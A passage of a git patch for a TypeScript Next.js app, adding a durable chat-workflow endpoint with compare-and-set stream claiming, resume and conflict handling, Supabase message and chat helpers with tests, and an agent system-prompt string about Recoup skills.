to `next` for + * the given chat. Domain wrapper over the generic `updateChat` helper — + * keeps the CAS-on-active_stream_id concept here (in the chat domain) + * rather than in the Supabase plumbing. + * + * Used by `/api/chat/workflow` to: + * - Claim the slot before `start(workflow)` (`expected: null`, `next: "pending-"`). + * - Promote the placeholder to the real run id after start. + * - Release a stale slot in `reconcileExistingActiveStream`. + * + * @param chatId - Target chat id. + * @param expected - The value `active_stream_id` must currently hold (null to + * require an unset slot). + * @param next - The value to write (null to release the slot). + */ +export async function compareAndSetChatActiveStreamId( + chatId: string, + expected: string | null, + next: string | null, +): Promise { + const result = await updateChat( + { id: chatId, where: { active_stream_id: expected } }, + { active_stream_id: next }, + ); + + if ("error" in result) { + return { ok: false, error: result.error }; + } + + return { ok: true, claimed: result.rowsUpdated > 0 }; +} diff --git a/lib/chat/handleChatWorkflowStream.ts b/lib/chat/handleChatWorkflowStream.ts index 137f699cb..dcaad8585 100644 --- a/lib/chat/handleChatWorkflowStream.ts +++ b/lib/chat/handleChatWorkflowStream.ts @@ -1,31 +1,56 @@ import { NextRequest, NextResponse } from "next/server"; -import { createUIMessageStream, createUIMessageStreamResponse } from "ai"; +import { createUIMessageStreamResponse, type UIMessageChunk } from "ai"; +import { start, getRun } from "workflow/api"; import { validateChatWorkflow } from "@/lib/chat/validateChatWorkflow"; +import { maybeResumeChatStream } from "@/lib/chat/maybeResumeChatStream"; import { selectSessions } from "@/lib/supabase/sessions/selectSessions"; import { selectChats } from "@/lib/supabase/chats/selectChats"; +import { compareAndSetChatActiveStreamId } from "@/lib/chat/compareAndSetChatActiveStreamId"; import { isSandboxActive } from "@/lib/sandbox/isSandboxActive"; +import { buildActiveLifecycleUpdate } from "@/lib/sandbox/buildActiveLifecycleUpdate"; +import { updateSession } from "@/lib/supabase/sessions/updateSession"; +import { persistLatestUserMessage } from "@/lib/chat/persistLatestUserMessage"; import { errorResponse } from "@/lib/networking/errorResponse"; import { getCorsHeaders } from "@/lib/networking/getCorsHeaders"; +import { runAgentWorkflow } from "@/app/lib/workflows/runAgentWorkflow"; import generateUUID from "@/lib/uuid/generateUUID"; +const DEFAULT_MODEL_ID = "anthropic/claude-haiku-4.5"; + /** * Handles POST /api/chat/workflow. * - * Stub implementation: delegates auth + body validation to validateChatWorkflow, - * verifies ownership of the referenced session + chat, confirms the session's - * sandbox is active, then returns a hardcoded UIMessage stream with an - * `x-workflow-run-id` header. The Vercel Workflow that will eventually drive - * the agent loop is wired up in a follow-up PR — this stub exists so clients - * can integrate against the contract documented at - * /api-reference/chat/workflow. + * Wires the chat UI to a durable Vercel Workflow agent loop. Flow: + * + * 1. Validate auth + body (validateChatWorkflow). + * 2. Verify session + chat ownership; ensure the session has an active sandbox. + * 3. If a workflow is already running for this chat, resume / 409 via + * maybeResumeChatStream (extracted for OCP). + * 4. **Claim `chats.active_stream_id` BEFORE starting the workflow** using + * a `pending-` placeholder CAS. Closes the race window where two + * concurrent requests could both call `start()` and bill the model + * before one loses the CAS. + * 5. Refresh the session's lifecycle-activity timestamp + fire-and-forget + * persist the latest user message. + * 6. start(runAgentWorkflow). Replace the placeholder with the real run id + * (we already own the slot, no CAS needed). + * 7. Return the workflow's UIMessage stream with x-workflow-run-id header. + * + * If we lost the placeholder CAS in step 4, the slot is already held by + * another in-flight or pending request → 409 (no workflow was started, so + * nothing to cancel). * - * @param request - The incoming NextRequest - * @returns A streaming Response (200) or a NextResponse error. + * Tools/sandbox passing is intentionally not wired here yet — the follow-up + * PR ports the @open-harness/agent tool surface into api. + * + * @param request - The incoming NextRequest. + * @returns A streaming 200 Response or a NextResponse error. */ export async function handleChatWorkflowStream(request: NextRequest): Promise { const validated = await validateChatWorkflow(request); if (validated instanceof NextResponse) return validated; + // Session + ownership + sandbox active const sessions = await selectSessions({ id: validated.sessionId }); if (sessions === null) return errorResponse("Internal server error", 500); const session = sessions[0]; @@ -33,29 +58,56 @@ export async function handleChatWorkflowStream(request: NextRequest): Promise { - const id = generateUUID(); - writer.write({ type: "text-start", id }); - writer.write({ type: "text-delta", id, delta: "Hello from /api/chat/workflow" }); - writer.write({ type: "text-end", id }); + // We own the slot — safe to start the workflow. + await updateSession(validated.sessionId, buildActiveLifecycleUpdate(session.sandbox_state)); + void persistLatestUserMessage(validated.chatId, validated.messages as never); + + const modelId = chat.model_id ?? DEFAULT_MODEL_ID; + const run = await start(runAgentWorkflow, [ + { + messages: validated.messages, + chatId: validated.chatId, + sessionId: validated.sessionId, + modelId, }, - }); + ]); + + // Promote placeholder → real run id via CAS. If something asynchronously + // stole the slot (or the DB went down) we cancel the workflow we just + // started since another stream now owns the client. + const promoted = await compareAndSetChatActiveStreamId(validated.chatId, placeholder, run.runId); + if (!promoted.ok || !promoted.claimed) { + try { + await getRun(run.runId).cancel(); + } catch (error) { + console.error("[handleChatWorkflowStream] cancel after slot-loss failed:", error); + } + return errorResponse("Another workflow is already running for this chat", 409); + } return createUIMessageStreamResponse({ - stream, - headers: { - ...getCorsHeaders(), - "x-workflow-run-id": runId, - }, + stream: run.getReadable(), + headers: { ...getCorsHeaders(), "x-workflow-run-id": run.runId }, }); } diff --git a/lib/chat/maybeResumeChatStream.ts b/lib/chat/maybeResumeChatStream.ts new file mode 100644 index 000000000..209113fbf --- /dev/null +++ b/lib/chat/maybeResumeChatStream.ts @@ -0,0 +1,40 @@ +import { createUIMessageStreamResponse, type UIMessageChunk } from "ai"; +import { reconcileExistingActiveStream } from "@/lib/chat/reconcileExistingActiveStream"; +import { errorResponse } from "@/lib/networking/errorResponse"; +import { getCorsHeaders } from "@/lib/networking/getCorsHeaders"; + +/** + * Encapsulates the "is there already a workflow for this chat?" branch of + * the POST /api/chat/workflow handler. + * + * - If `activeStreamId` is unset → returns `null`; handler proceeds with + * a fresh workflow. + * - If a workflow is alive → returns a streaming `Response` that pipes + * the existing run's readable back to the client. + * - If the slot is held by a dead/transient/raced run → returns a 409 + * `Response`. + * + * Extracted from the handler so the orchestration stays small and the + * resume-vs-conflict logic can grow independently. + */ +export async function maybeResumeChatStream( + chatId: string, + activeStreamId: string | null, +): Promise { + if (!activeStreamId) return null; + + const reconciled = await reconcileExistingActiveStream(chatId, activeStreamId); + + if (reconciled.action === "resume") { + return createUIMessageStreamResponse({ + stream: reconciled.stream as ReadableStream, + headers: { ...getCorsHeaders(), "x-workflow-run-id": reconciled.runId }, + }); + } + + if (reconciled.action === "conflict") { + return errorResponse("Another workflow is already running for this chat", 409); + } + + return null; // action: "ready" — caller starts a new workflow. +} diff --git a/lib/chat/persistLatestUserMessage.ts b/lib/chat/persistLatestUserMessage.ts new file mode 100644 index 000000000..73c06f5ef --- /dev/null +++ b/lib/chat/persistLatestUserMessage.ts @@ -0,0 +1,84 @@ +import { upsertChatMessage } from "@/lib/supabase/chat_messages/upsertChatMessage"; +import { selectChatMessages } from "@/lib/supabase/chat_messages/selectChatMessages"; +import { updateChat } from "@/lib/supabase/chats/updateChat"; + +type TextPart = { type: "text"; text: string }; +type UserMessage = { id: string; role: string; parts: Array }; + +const TITLE_MAX_LENGTH = 80; +const TRUNCATION_SUFFIX = "…"; +const TITLE_BODY_BUDGET = TITLE_MAX_LENGTH - TRUNCATION_SUFFIX.length; + +/** + * Fire-and-forget persistence of the latest user message in a chat-workflow + * request. Called before `start(runAgentWorkflow, ...)` so that: + * + * - A page refresh during workflow queue time still shows the user message. + * - The chat's `updated_at` reflects activity even if the workflow hasn't + * produced its first chunk yet. + * - The chat title is set from the first user message (capped at 80 chars + * including the truncation suffix, addressing the prior off-by-3 bug). + * + * Title-eligibility uses "earliest message in the chat", not "only message", + * so a fast-following second message can't race past the title-set. + * + * All failures are caught and logged — this MUST NOT block the request path. + * + * @param chatId - The target chat. + * @param messages - The full message list from the request body. + */ +export async function persistLatestUserMessage( + chatId: string, + messages: UserMessage[], +): Promise { + try { + const latest = messages[messages.length - 1]; + if (!latest || latest.role !== "user") return; + + const inserted = await upsertChatMessage({ + id: latest.id, + chat_id: chatId, + role: "user", + parts: latest as never, + }); + + // Bail on DB errors (already logged). Don't touch the chat or set a title + // since we can't confirm the message landed. + if (!inserted.ok) return; + + // If it was a duplicate, the original insert already drove side effects. + if (inserted.isDuplicate || inserted.row === null) return; + + await updateChat({ id: chatId }, { updated_at: new Date().toISOString() }); + + // Title-set is gated on "is this row still the earliest message in the chat?" + // — a fast follow-up message that landed before this query wouldn't shift + // the earliest row's id, so we'd still title from this message correctly, + // and racing in the opposite direction (this message landed second) gives + // us a different id at position 0 and we correctly skip. + const earliest = await selectChatMessages({ + chatId, + orderBy: { createdAt: "asc" }, + limit: 1, + }); + + // DB-error or no rows — bail without titling. + if (!earliest || earliest.length === 0) return; + if (earliest[0]?.id !== inserted.row.id) return; + + const text = latest.parts + .filter((part): part is TextPart => part.type === "text") + .map(part => part.text) + .join(" ") + .trim(); + if (text.length === 0) return; + + const title = + text.length > TITLE_MAX_LENGTH + ? `${text.slice(0, TITLE_BODY_BUDGET)}${TRUNCATION_SUFFIX}` + : text; + await updateChat({ id: chatId }, { title }); + } catch (error) { + console.error("[persistLatestUserMessage] error:", error); + } +} diff --git a/lib/chat/reconcileExistingActiveStream.ts b/lib/chat/reconcileExistingActiveStream.ts new file mode 100644 index 000000000..4ab004493 --- /dev/null +++ b/lib/chat/reconcileExistingActiveStream.ts @@ -0,0 +1,56 @@ +import { getRun } from "workflow/api"; +import { compareAndSetChatActiveStreamId } from "@/lib/chat/compareAndSetChatActiveStreamId"; + +export type ReconcileResult = + | { action: "resume"; runId: string; stream: ReadableStream } + | { action: "ready" } + | { action: "conflict" }; + +const RUNNING_STATUSES = new Set(["running", "pending"]); + +/** + * Resolves what to do when `chats.active_stream_id` is already set at the + * start of a new chat-workflow request. + * + * - If the referenced workflow run is alive (`running` | `pending`) → + * `action: "resume"` with the existing readable. Caller pipes it back to + * the client. + * - If the run is terminally done AND we win the CAS to clear the stale id + * → `action: "ready"`. Caller starts a fresh workflow. + * - **Anything else** (workflow API throws, CAS-clear loses the race, CAS + * reports a DB error) → `action: "conflict"`. Surfaces as 409 upstream. + * + * Safer-than-open-agents error semantics: a transient `workflow/api` failure + * does NOT clear the stale stream id (which previously created a window for + * duplicate runs). When we can't confidently say "this stream is dead", we + * refuse to start a new one. Eventually the real run completes, a subsequent + * request observes that, clears the slot, and unblocks. + */ +export async function reconcileExistingActiveStream( + chatId: string, + activeStreamId: string, +): Promise { + // Probe the workflow status. Any thrown error here is treated as transient — + // we keep the slot held rather than risk starting a duplicate run. + let status: string; + try { + const existingRun = getRun(activeStreamId); + status = await existingRun.status; + if (RUNNING_STATUSES.has(status)) { + return { action: "resume", runId: activeStreamId, stream: existingRun.getReadable() }; + } + } catch (error) { + console.error("[reconcileExistingActiveStream] getRun failed; treating as conflict:", error); + return { action: "conflict" }; + } + + // Run is terminally done. Attempt to clear the stale id via CAS. If we + // win → ready. Anything else (race lost OR DB error) → conflict, so we + // never accidentally start a duplicate workflow on the back of a failed + // read. + const cleared = await compareAndSetChatActiveStreamId(chatId, activeStreamId, null); + if (cleared.ok && cleared.claimed) { + return { action: "ready" }; + } + return { action: "conflict" }; +} diff --git a/lib/chat/recoupApiSkillPrompt.ts b/lib/chat/recoupApiSkillPrompt.ts new file mode 100644 index 000000000..93f4d2e39 --- /dev/null +++ b/lib/chat/recoupApiSkillPrompt.ts @@ -0,0 +1,11 @@ +/** + * Always-on nudge appended to the agent's system instructions. Points + * at the `recoup-api` and `artist-workspace` skills so prompts about + * anything owned by the user's Recoup account reliably load the right + * playbook — either the filesystem (for sandbox inventory and create- + * artist scaffolding) or the API (for live data) — instead of the + * agent guessing endpoint paths or interpreting overloaded nouns like + * "tasks" as generic repo TODOs. + */ +export const recoupApiSkillPrompt = + 'If you\'re asked about anything belonging to their Recoup account — artists, socials, orgs, research, tasks, chats, pulses, notifications, subscriptions, or any other resource visible at recoup-api.vercel.app / developers.recoupable.com — pick the right skill first instead of guessing. For inventory questions about this sandbox ("what artists / orgs do I have", "list my artists", "what\'s in here") load `artist-workspace` — the `artists/{artist-slug}/RECOUP.md` tree is authoritative for this sandbox (the sandbox is already org-scoped — its repo IS the org — so artists live at the top level, not under an `orgs/` directory) and the API is not. For create-artist intents ("create artist", "onboard X", "add an artist", "set up a new artist") also load `artist-workspace` first — it scaffolds the artist\'s `RECOUP.md` as a checklist file you tick off step-by-step, which is what keeps the 8-step chain from dropping steps when run from a sandbox; the curl-by-curl reference for each step lives via `recoup-api` (developers.recoupable.com/workflows/create-artist), but the checklist file is the source of truth for what\'s done. For live data (socials, posts, metrics, research, tasks, notifications) or anything not in the tree, load `recoup-api` — and when `RECOUP_ORG_ID` is set in the env, scope list endpoints to that org (`/api/organizations/$RECOUP_ORG_ID/...`, `--org $RECOUP_ORG_ID` on the CLI) so you get results for the sandbox\'s org, not every org the user belongs to. Treat ambiguous account-data questions as Recoup questions by default, not repo-level TODOs.'; diff --git a/lib/recoupable/__tests__/extractOrgId.test.ts b/lib/recoupable/__tests__/extractOrgId.test.ts new file mode 100644 index 000000000..c38232c4c --- /dev/null +++ b/lib/recoupable/__tests__/extractOrgId.test.ts @@ -0,0 +1,57 @@ +import { describe, it, expect } from "vitest"; +import { extractOrgId } from "@/lib/recoupable/extractOrgId"; + +describe("extractOrgId", () => { + it("extracts the UUID tail from a full clone URL", () => { + expect( + extractOrgId( + "https://github.com/recoupable/org-rostrum-pacific-cebcc866-34c3-451c-8cd7-f63309acff0a", + ), + ).toBe("cebcc866-34c3-451c-8cd7-f63309acff0a"); + }); + + it("strips a .git suffix before extracting", () => { + expect( + extractOrgId( + "https://github.com/recoupable/org-myco-wtf-80263819-9dfd-4bbf-9371-60a6185122d6.git", + ), + ).toBe("80263819-9dfd-4bbf-9371-60a6185122d6"); + }); + + it("tolerates a trailing slash on the URL", () => { + expect( + extractOrgId( + "https://github.com/recoupable/org-myco-wtf-80263819-9dfd-4bbf-9371-60a6185122d6/", + ), + ).toBe("80263819-9dfd-4bbf-9371-60a6185122d6"); + }); + + it("accepts an already-extracted repo name", () => { + expect(extractOrgId("org-rostrum-pacific-cebcc866-34c3-451c-8cd7-f63309acff0a")).toBe( + "cebcc866-34c3-451c-8cd7-f63309acff0a", + ); + }); + + it("lowercases an uppercase UUID", () => { + expect(extractOrgId("org-myco-wtf-80263819-9DFD-4BBF-9371-60A6185122D6")).toBe( + "80263819-9dfd-4bbf-9371-60a6185122d6", + ); + }); + + it("returns null for non-Recoupable clone URLs", () => { + expect( + extractOrgId( + "https://github.com/someone-else/org-myco-wtf-80263819-9dfd-4bbf-9371-60a6185122d6", + ), + ).toBeNull(); + }); + + it("returns null when the repo name has no UUID tail", () => { + expect(extractOrgId("org-rostrum-pacific")).toBeNull(); + }); + + it("returns null for malformed strings", () => { + expect(extractOrgId("")).toBeNull(); + expect(extractOrgId("not-a-url-or-repo")).toBeNull(); + }); +}); diff --git a/lib/recoupable/extractOrgId.ts b/lib/recoupable/extractOrgId.ts new file mode 100644 index 000000000..ac30985c5 --- /dev/null +++ b/lib/recoupable/extractOrgId.ts @@ -0,0 +1,31 @@ +import { extractOrgRepoName } from "@/lib/recoupable/extractOrgRepoName"; + +const UUID_TAIL_PATTERN = /-([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})$/i; + +/** + * Extracts the organization UUID from a Recoupable org clone URL or + * repo name. Recoupable orgs follow the convention `org--` + * in their GitHub repo names, so the UUID is always the trailing 36 chars. + * + * Used by the chat workflow handler to derive `recoupOrgId` from the + * session's clone URL — the `recoup-api` skill scopes calls to this org + * so sandbox agents see results for the sandbox's org rather than every + * org the user belongs to. + * + * @param cloneUrlOrRepoName - Either the full clone URL + * (`https://github.com/recoupable/org-foo-`) or the already-extracted + * repo name (`org-foo-`). + * @returns The lowercased UUID, or `null` for anything that doesn't match. + */ +export function extractOrgId(cloneUrlOrRepoName: string): string | null { + const repoName = cloneUrlOrRepoName.startsWith("http") + ? extractOrgRepoName(cloneUrlOrRepoName) + : cloneUrlOrRepoName; + + if (!repoName) { + return null; + } + + const match = repoName.match(UUID_TAIL_PATTERN); + return match?.[1]?.toLowerCase() ?? null; +} diff --git a/lib/supabase/chat_messages/__tests__/selectChatMessages.test.ts b/lib/supabase/chat_messages/__tests__/selectChatMessages.test.ts new file mode 100644 index 000000000..c973f24df --- /dev/null +++ b/lib/supabase/chat_messages/__tests__/selectChatMessages.test.ts @@ -0,0 +1,58 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { selectChatMessages } from "@/lib/supabase/chat_messages/selectChatMessages"; + +const selectChain = vi.fn(); +const eqChain = vi.fn(); +const orderChain = vi.fn(); +const limitChain = vi.fn(); + +vi.mock("@/lib/supabase/serverClient", () => ({ + default: { + from: vi.fn(() => ({ select: selectChain })), + }, +})); + +beforeEach(() => { + vi.clearAllMocks(); + // Allow any number of chained .eq() / .order() / .limit() calls — they all + // return the same fluent builder. + const builder = { eq: eqChain, order: orderChain, limit: limitChain }; + selectChain.mockReturnValue(builder); + eqChain.mockReturnValue(builder); + orderChain.mockReturnValue(builder); + limitChain.mockReturnValue(builder); +}); + +describe("selectChatMessages", () => { + it("returns rows on success", async () => { + limitChain.mockResolvedValue({ data: [{ id: "m-1" }], error: null }); + const result = await selectChatMessages({ + chatId: "c-1", + orderBy: { createdAt: "asc" }, + limit: 1, + }); + expect(result).toEqual([{ id: "m-1" }]); + expect(eqChain).toHaveBeenCalledWith("chat_id", "c-1"); + expect(orderChain).toHaveBeenCalledWith("created_at", { ascending: true }); + expect(limitChain).toHaveBeenCalledWith(1); + }); + + it("returns null on Supabase error (so callers can distinguish from empty)", async () => { + // With no filters, the terminal call is on selectChain itself + selectChain.mockResolvedValue({ data: null, error: { message: "down" } }); + const result = await selectChatMessages({}); + expect(result).toBeNull(); + }); + + it("returns [] on no match", async () => { + limitChain.mockResolvedValue({ data: [], error: null }); + const result = await selectChatMessages({ chatId: "c-1", limit: 1 }); + expect(result).toEqual([]); + }); + + it("applies desc ordering when requested", async () => { + limitChain.mockResolvedValue({ data: [], error: null }); + await selectChatMessages({ chatId: "c-1", orderBy: { createdAt: "desc" }, limit: 1 }); + expect(orderChain).toHaveBeenCalledWith("created_at", { ascending: false }); + }); +}); diff --git a/lib/supabase/chat_messages/__tests__/upsertChatMessage.test.ts b/lib/supabase/chat_messages/__tests__/upsertChatMessage.test.ts new file mode 100644 index 000000000..0ea559058 --- /dev/null +++ b/lib/supabase/chat_messages/__tests__/upsertChatMessage.test.ts @@ -0,0 +1,46 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { upsertChatMessage } from "@/lib/supabase/chat_messages/upsertChatMessage"; + +const upsertChain = vi.fn(); +const selectChain = vi.fn(); +const maybeSingleChain = vi.fn(); + +vi.mock("@/lib/supabase/serverClient", () => ({ + default: { + from: vi.fn(() => ({ upsert: upsertChain })), + }, +})); + +beforeEach(() => { + vi.clearAllMocks(); + upsertChain.mockReturnValue({ select: selectChain }); + selectChain.mockReturnValue({ maybeSingle: maybeSingleChain }); +}); + +const data = { + id: "msg-1", + chat_id: "chat-1", + role: "user" as const, + parts: [{ type: "text", text: "hi" }], +}; + +describe("upsertChatMessage", () => { + it("returns ok:true with the row and isDuplicate:false on new insert", async () => { + maybeSingleChain.mockResolvedValue({ data, error: null }); + const result = await upsertChatMessage(data); + expect(result).toEqual({ ok: true, row: data, isDuplicate: false }); + expect(upsertChain).toHaveBeenCalledWith(data, { onConflict: "id", ignoreDuplicates: true }); + }); + + it("returns ok:true with isDuplicate:true when the id already existed", async () => { + maybeSingleChain.mockResolvedValue({ data: null, error: null }); + const result = await upsertChatMessage(data); + expect(result).toEqual({ ok: true, row: null, isDuplicate: true }); + }); + + it("returns ok:false with error on Supabase failure (distinct from duplicate)", async () => { + maybeSingleChain.mockResolvedValue({ data: null, error: { message: "down" } }); + const result = await upsertChatMessage(data); + expect(result).toEqual({ ok: false, error: "down" }); + }); +}); diff --git a/lib/supabase/chat_messages/selectChatMessages.ts b/lib/supabase/chat_messages/selectChatMessages.ts new file mode 100644 index 000000000..ff2ceae24 --- /dev/null +++ b/lib/supabase/chat_messages/selectChatMessages.ts @@ -0,0 +1,40 @@ +import supabase from "@/lib/supabase/serverClient"; +import type { Tables } from "@/types/database.types"; + +export type SelectChatMessagesFilter = { + id?: string; + chatId?: string; + /** Order by `created_at` direction. Defaults to ascending (oldest first). */ + orderBy?: { createdAt: "asc" | "desc" }; + /** Maximum rows to return. Omit for no limit. */ + limit?: number; +}; + +/** + * Generic `chat_messages` reader mirroring the `selectChats` / `selectSessions` + * pattern. Returns rows on success, `[]` on no match, or `null` on Supabase + * error so callers can distinguish "nothing here" from "DB unreachable". + * + * Domain-specific questions ("is this the first message in the chat?") live + * in wrapper helpers under `lib/chat/` — keep this file focused on the + * read primitive. + */ +export async function selectChatMessages( + filter: SelectChatMessagesFilter = {}, +): Promise[] | null> { + let query = supabase.from("chat_messages").select("*"); + if (filter.id) query = query.eq("id", filter.id); + if (filter.chatId) query = query.eq("chat_id", filter.chatId); + if (filter.orderBy) { + query = query.order("created_at", { ascending: filter.orderBy.createdAt === "asc" }); + query = query.order("id", { ascending: true }); + } + if (filter.limit !== undefined) query = query.limit(filter.limit); + + const { data, error } = await query; + if (error) { + console.error("[selectChatMessages] error:", error); + return null; + } + return data ?? []; +} diff --git a/lib/supabase/chat_messages/upsertChatMessage.ts b/lib/supabase/chat_messages/upsertChatMessage.ts new file mode 100644 index 000000000..d98b9b343 --- /dev/null +++ b/lib/supabase/chat_messages/upsertChatMessage.ts @@ -0,0 +1,37 @@ +import supabase from "@/lib/supabase/serverClient"; +import type { Tables, TablesInsert } from "@/types/database.types"; + +/** + * Discriminated result so callers can distinguish: + * - `{ ok: true, row, isDuplicate }` — known outcome; row is null when the + * existing `id` conflict was silently ignored. + * - `{ ok: false, error }` — Supabase failure. Visible to logs so transient + * DB problems aren't masked as duplicates. + */ +export type UpsertChatMessageResult = + | { ok: true; row: Tables<"chat_messages"> | null; isDuplicate: boolean } + | { ok: false; error: string }; + +/** + * Insert-or-skip a single chat message row. Wraps Supabase upsert with + * `ignoreDuplicates: true` on the `id` primary key, but returns a + * discriminated result so callers can tell "duplicate skipped" apart from + * "DB error" — the previous helper returned `null` for both, which made + * callers silently swallow operational failures. + */ +export async function upsertChatMessage( + data: TablesInsert<"chat_messages">, +): Promise { + const { data: row, error } = await supabase + .from("chat_messages") + .upsert(data, { onConflict: "id", ignoreDuplicates: true }) + .select() + .maybeSingle(); + + if (error) { + console.error("[upsertChatMessage] error:", error); + return { ok: false, error: error.message }; + } + + return { ok: true, row, isDuplicate: row === null }; +} diff --git a/lib/supabase/chats/__tests__/updateChat.test.ts b/lib/supabase/chats/__tests__/updateChat.test.ts new file mode 100644 index 000000000..a0edc247b --- /dev/null +++ b/lib/supabase/chats/__tests__/updateChat.test.ts @@ -0,0 +1,110 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { updateChat } from "@/lib/supabase/chats/updateChat"; + +const updateChain = vi.fn(); +const eqChain = vi.fn(); +const matchChain = vi.fn(); +const isChain = vi.fn(); +const selectChain = vi.fn(); + +vi.mock("@/lib/supabase/serverClient", () => ({ + default: { + from: vi.fn(() => ({ update: updateChain })), + }, +})); + +beforeEach(() => { + vi.clearAllMocks(); + // Fluent builder mock — every method returns the same builder so we can + // chain .eq / .match / .is / .select in any order without per-step setup. + const builder = { eq: eqChain, match: matchChain, is: isChain, select: selectChain }; + updateChain.mockReturnValue(builder); + eqChain.mockReturnValue(builder); + matchChain.mockReturnValue(builder); + isChain.mockReturnValue(builder); +}); + +describe("updateChat", () => { + describe("plain update (no where predicate)", () => { + it("returns ok:true with rowsUpdated and the row on success", async () => { + const row = { id: "chat-1", title: "renamed" }; + selectChain.mockResolvedValue({ data: [row], error: null }); + const result = await updateChat({ id: "chat-1" }, { title: "renamed" }); + expect(result.ok).toBe(true); + if (!result.ok) return; + expect(result.rowsUpdated).toBe(1); + expect(result.row).toEqual(row); + expect(updateChain).toHaveBeenCalledWith({ title: "renamed" }); + expect(eqChain).toHaveBeenCalledWith("id", "chat-1"); + // With no where filter, match is called with an empty object. + expect(matchChain).toHaveBeenCalledWith({}); + }); + + it("returns ok:false with error on Supabase failure", async () => { + selectChain.mockResolvedValue({ data: null, error: { message: "down" } }); + const result = await updateChat({ id: "chat-x" }, { title: "x" }); + expect(result.ok).toBe(false); + if (result.ok) return; + expect(result.error).toBe("down"); + }); + }); + + describe("generic where predicate", () => { + it("emits `is null` for null values (e.g. CAS expecting unset)", async () => { + selectChain.mockResolvedValue({ data: [{ id: "c-1" }], error: null }); + await updateChat( + { id: "c-1", where: { active_stream_id: null } }, + { active_stream_id: "wrun_x" }, + ); + expect(isChain).toHaveBeenCalledWith("active_stream_id", null); + // No non-null fields → match called with empty {} + expect(matchChain).toHaveBeenCalledWith({}); + }); + + it("emits `match()` for non-null values (e.g. CAS expecting a specific run id)", async () => { + selectChain.mockResolvedValue({ data: [{ id: "c-1" }], error: null }); + await updateChat( + { id: "c-1", where: { active_stream_id: "wrun_old" } }, + { active_stream_id: "wrun_new" }, + ); + expect(matchChain).toHaveBeenCalledWith({ active_stream_id: "wrun_old" }); + // No null fields → is() not called + expect(isChain).not.toHaveBeenCalled(); + }); + + it("AND-s nullable + equality where columns together", async () => { + selectChain.mockResolvedValue({ data: [{ id: "c-1" }], error: null }); + await updateChat( + { id: "c-1", where: { active_stream_id: null, model_id: "anthropic/claude-haiku-4.5" } }, + { title: "x" }, + ); + expect(isChain).toHaveBeenCalledWith("active_stream_id", null); + expect(matchChain).toHaveBeenCalledWith({ model_id: "anthropic/claude-haiku-4.5" }); + }); + + it("returns ok:true rowsUpdated:0 when the predicate matches no row (race lost)", async () => { + selectChain.mockResolvedValue({ data: [], error: null }); + const result = await updateChat( + { id: "c-1", where: { active_stream_id: null } }, + { active_stream_id: "wrun_x" }, + ); + expect(result).toEqual(expect.objectContaining({ ok: true, rowsUpdated: 0 })); + }); + + it("differentiates 'race lost' (ok:true,rows:0) from 'DB error' (ok:false)", async () => { + selectChain.mockResolvedValueOnce({ data: [], error: null }); + const raceLost = await updateChat( + { id: "c-1", where: { active_stream_id: null } }, + { active_stream_id: "wrun_x" }, + ); + expect(raceLost).toEqual(expect.objectContaining({ ok: true, rowsUpdated: 0 })); + + selectChain.mockResolvedValueOnce({ data: null, error: { message: "down" } }); + const dbError = await updateChat( + { id: "c-1", where: { active_stream_id: null } }, + { active_stream_id: "wrun_x" }, + ); + expect(dbError).toEqual(expect.objectContaining({ ok: false, error: "down" })); + }); + }); +}); diff --git a/lib/supabase/chats/updateChat.ts b/lib/supabase/chats/updateChat.ts new file mode 100644 index 000000000..63cd2064b --- /dev/null +++ b/lib/supabase/chats/updateChat.ts @@ -0,0 +1,86 @@ +import supabase from "@/lib/supabase/serverClient"; +import type { Tables, TablesUpdate } from "@/types/database.types"; + +/** + * Subset of `chats` columns that callers are permitted to mutate via this + * helper. Explicitly excludes structural fields (`id`, `session_id`, + * `created_at`) so generic updates cannot bypass chat invariants. + */ +export type ChatMutableFields = Pick< + TablesUpdate<"chats">, + "title" | "model_id" | "updated_at" | "active_stream_id" | "last_assistant_message_at" +>; + +/** + * Filter accepted by {@link updateChat}. Always matches by `id`. Optional + * `where` adds AND-ed predicates per column — generic across columns so + * domain-specific concerns (e.g. CAS on `active_stream_id`) stay in their + * own wrapper helpers rather than baking into the Supabase plumbing. + * + * Each `where` entry maps to `column = value` (or `column IS NULL` when + * `value === null`). + */ +export type UpdateChatFilter = { + id: string; + where?: Partial>; +}; + +/** + * Discriminated result so callers can distinguish: + * - `{ ok: true, rowsUpdated: 1 }` — updated as intended. + * - `{ ok: true, rowsUpdated: 0 }` — the predicate matched zero rows (a CAS + * race lost, or `id` not found). + * - `{ ok: false, error }` — Supabase / network failure. + */ +export type UpdateChatResult = + | { ok: true; rowsUpdated: number; row: Tables<"chats"> | null } + | { ok: false; error: string }; + +/** + * Updates a `chats` row by id, optionally constrained by a generic `where` + * predicate. Returns a discriminated result so callers can tell + * "predicate didn't match" (a race lost) from "Supabase failure" (operational + * issue) — the previous behavior of returning `false` for both was a CAS bug. + */ +export async function updateChat( + filter: UpdateChatFilter, + updates: ChatMutableFields, +): Promise { + // Split the optional `where` map into nullable vs equality predicates so we + // can apply each as a single chained call (`.match()` for equalities, + // `.is(col, null)` per nullable). Iterating with `let query = ...` and + // reassigning in a for-loop confuses Supabase's deeply generic builder + // types ("type instantiation is excessively deep") in the Next.js build. + const entries = Object.entries(filter.where ?? {}); + const equalityMatches: Record = {}; + const nullColumns: string[] = []; + for (const [column, value] of entries) { + if (value === null) { + nullColumns.push(column); + } else { + equalityMatches[column] = value; + } + } + + const baseQuery = supabase + .from("chats") + .update(updates) + .eq("id", filter.id) + .match(equalityMatches); + const finalQuery = nullColumns.reduce( + (q, column) => q.is(column, null) as typeof baseQuery, + baseQuery, + ); + + const { data, error } = await finalQuery.select(); + if (error) { + console.error("[updateChat] error:", error); + return { ok: false, error: error.message }; + } + + return { + ok: true, + rowsUpdated: data?.length ?? 0, + row: data?.[0] ?? null, + }; +} From dcddcbffabe284f8c9b577ecefc7961174e16a49 Mon Sep 17 00:00:00 2001 From: "sweetman.eth" Date: Thu, 21 May 2026 13:12:07 -0500 Subject: [PATCH 03/10] feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4, slim) (#583) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4 of 4, slim) Slim PR 4: ports the `bash` sandbox tool from open-agents and wires it through the workflow via streamText's 